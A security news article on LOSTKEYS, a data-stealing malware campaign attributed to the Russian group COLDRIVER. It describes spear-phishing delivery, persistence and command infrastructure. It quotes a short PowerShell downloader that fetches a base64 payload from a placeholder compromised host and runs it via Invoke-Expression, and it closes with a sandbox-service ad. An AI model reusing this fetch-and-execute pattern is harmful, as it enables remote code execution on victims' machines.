Cybersecurity researchers have uncovered a sophisticated malware campaign attributed to the Russian threat actor COLDRIVER, also known as Star Blizzard or Callisto.

The newly identified malware, dubbed LOSTKEYS, has been observed targeting diplomatic institutions, defense contractors, and critical infrastructure organizations across Europe and North America since early 2025.

Initial analysis indicates the malware is designed specifically for data exfiltration operations, with a focus on credentials, sensitive documents, and communications.

LOSTKEYS primarily propagates through spear-phishing emails containing malicious document attachments that exploit previously undisclosed vulnerabilities in popular office productivity software.

These emails are meticulously crafted to appear legitimate, often masquerading as correspondence from trusted partners or government agencies.

When the victim opens the attachment, a multi-stage infection process begins silently in the background, establishing persistence while evading detection by conventional security solutions.

Google Threat Intelligence researchers identified the campaign after observing unusual data transfer patterns from several high-profile organizations.

Their analysis revealed the malware’s sophisticated obfuscation techniques and command-and-control infrastructure, which leverages compromised legitimate websites as proxies to mask its true origin and complicate attribution efforts.

The impact of LOSTKEYS infections has been substantial, with affected organizations reporting significant intellectual property theft and unauthorized access to sensitive communications.

The malware’s stealthy nature means many victims remain unaware of its presence for extended periods, allowing the attackers to maintain persistent access and continuously harvest valuable data.

Security agencies across multiple countries have issued alerts warning potential targets about this evolving threat.

LOSTKEYS demonstrates COLDRIVER’s continued evolution in capabilities and tactics, representing a significant advancement over their previous tools.

The group’s targeting patterns align with Russian strategic intelligence priorities, further strengthening attribution confidence.

Infection Mechanism Analysis

The malware’s infection chain begins with a weaponized document containing obfuscated VBA macros.

When executed, these macros deploy a PowerShell downloader that retrieves the main LOSTKEYS payload:-

$c = New-Object System.Net.WebClient;
$c.Headers.Add("User-Agent","Mozilla/5.0");
$d = $c.DownloadString("hxxps://compromised-site.com/images/update.txt");
$decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($d));
Invoke-Expression $decoded

This initial stage establishes persistence through a combination of registry modifications and scheduled task creation.

The malware then performs environment checks to identify security tools, executing evasive maneuvers when necessary.

LOSTKEYS communicates with its command servers using encrypted channels that mimic legitimate HTTPS traffic, making detection through network monitoring extremely challenging.

The malware’s modular architecture allows operators to deploy additional capabilities as needed, tailoring the attack to each specific target.

Are you from the SOC and DFIR Teams? – Analyse Real time Malware Incidents with ANY.RUN -> Start Now for Free.